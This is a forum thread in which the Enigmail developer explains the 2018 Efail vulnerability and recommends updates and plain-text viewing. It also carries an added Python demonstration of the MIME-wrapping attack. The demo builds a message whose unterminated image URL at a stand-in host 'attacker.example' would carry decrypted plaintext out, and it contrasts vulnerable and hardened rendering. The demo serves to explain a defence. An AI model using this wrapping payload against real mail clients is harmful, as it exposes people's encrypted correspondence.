
Efail Vulnerability and Enigmail

2018-05-14
2018-05-24
  • Patrick Brunschwig

    Today, information about the Efail vulnerability was released. This weakness was addressed in Enigmail 2.0, released in March 2018. Unfortunately, this vulnerability does not only affect Enigmail but also Thunderbird. Thunderbird is not yet completely fixed today; the developers are still working on fixing the vulnerability on their side.

    I therefore recommend that you install the latest versions of Thunderbird and Enigmail (currently 52.7 and 2.0.3 respectively), and disable viewing HTML mails in Thunderbird via menu View > Message Body as > Plain Text. This will protect you against any form of the vulnerability described. Furthermore, once Thunderbird 52.8 is released, I recommend upgrading as soon as possible.

    Details

    There are two different attacks outlined in the Efail paper. One targets OpenPGP directly, and GnuPG has had mitigations against it for almost twenty years. Reports saying that GnuPG is vulnerable are wrong.

    The other one targets buggy MIME parsing by email clients. Enigmail previously had some susceptibility to it, but as of Enigmail 2.0 we've closed up all the leaks on our side of things. There is still an attack surface in Thunderbird. The code to fix that has been checked into Thunderbird and will be part of the next Thunderbird release.


    Last edit: Patrick Brunschwig 2018-05-15
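
The MIME-parsing attack mentioned under Details, as an added Python demonstration (this is not Enigmail or Thunderbird code). It builds a multipart/mixed message in which attacker-controlled HTML parts surround an encrypted part, then contrasts a client that decrypts and concatenates all parts into one HTML document with a client that renders each part on its own, and with the plain-text view recommended above. The host `attacker.example`, the media type `application/x-demo-encrypted` and the "decryption" of that part are placeholders; a real message would carry a PGP/MIME part that the client hands to GnuPG.

```python
"""Added demonstration of the MIME-wrapping pattern behind the client-side
Efail attack. Not Enigmail or Thunderbird code; message, attacker host and
the "encrypted" part are constructed placeholders."""
import html
from email import policy
from email.message import EmailMessage, MIMEPart
from email.parser import BytesParser
from html.parser import HTMLParser

# Constructed plaintext standing in for the content of a real OpenPGP part.
SECRET = "the password is hunter2"
# Hypothetical media type for the placeholder part (real mail: PGP/MIME).
PLACEHOLDER_CT = "application/x-demo-encrypted"


def build_wrapped_message(secret: str) -> bytes:
    """Attacker-built multipart/mixed: HTML head, encrypted part, HTML tail."""
    msg = EmailMessage(policy=policy.default)
    msg["From"] = "attacker@attacker.example"
    msg["To"] = "victim@example.net"
    msg["Subject"] = "constructed sample"
    msg["MIME-Version"] = "1.0"
    msg.make_mixed()

    head = MIMEPart(policy=policy.default)
    # The src attribute is deliberately left unterminated.
    head.set_content('<img src="https://attacker.example/collect?d=', subtype="html")
    msg.attach(head)

    enc = MIMEPart(policy=policy.default)
    # Placeholder: a real client would pass this body to GnuPG for decryption.
    enc.set_content(secret.encode(), maintype="application", subtype="x-demo-encrypted")
    msg.attach(enc)

    tail = MIMEPart(policy=policy.default)
    tail.set_content('">', subtype="html")
    msg.attach(tail)
    return msg.as_bytes()


def decrypt_placeholder(part) -> str:
    """Stands in for GnuPG decryption of the placeholder part."""
    return part.get_content().decode()


def part_text(part) -> str:
    """Text a client would render for one part (decrypting where needed)."""
    if part.get_content_type() == PLACEHOLDER_CT:
        return decrypt_placeholder(part)
    return part.get_content()


class ImgSrcCollector(HTMLParser):
    """Records every <img src=...> URL a rendering engine would try to fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.urls.append(value)


def extract_img_urls(doc: str) -> list:
    p = ImgSrcCollector()
    p.feed(doc)
    p.close()
    return p.urls


def naive_render(raw: bytes) -> str:
    """Buggy client: decrypts, then glues all parts into ONE HTML document,
    so the decrypted text lands inside the attacker's unterminated src quote."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return "".join(part_text(p) for p in msg.iter_parts())


def render_per_part(raw: bytes) -> list:
    """Hardened: each MIME part is its own document, so the attacker's
    wrapper cannot swallow the decrypted part."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return [part_text(p) for p in msg.iter_parts()]


def render_plain_text(raw: bytes) -> str:
    """Equivalent of View > Message Body As > Plain Text: markup is shown
    literally, so there is no <img> for the client to fetch."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return "".join(html.escape(part_text(p)) for p in msg.iter_parts())


def leaks(urls, secret: str) -> bool:
    """True if the plaintext would be sent to a remote host via an image URL."""
    return any(secret in u for u in urls)


if __name__ == "__main__":
    raw = build_wrapped_message(SECRET)
    print("concatenated HTML leaks:", leaks(extract_img_urls(naive_render(raw)), SECRET))
    print("per-part rendering leaks:",
          any(leaks(extract_img_urls(d), SECRET) for d in render_per_part(raw)))
    print("plain-text view leaks:", leaks(extract_img_urls(render_plain_text(raw)), SECRET))
```

Running the script prints a leak only for the concatenating client. Rendering parts in isolation is the structural fix on the client side; the plain-text view is the user-side workaround from the recommendation above, because it removes the rendered `<img>` altogether rather than relying on the remote-content blocker.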
  • wildman

    wildman - 2018-05-24

    Thank you for the hard work. Wish more people would use encrypted mail and... donate to the cause!

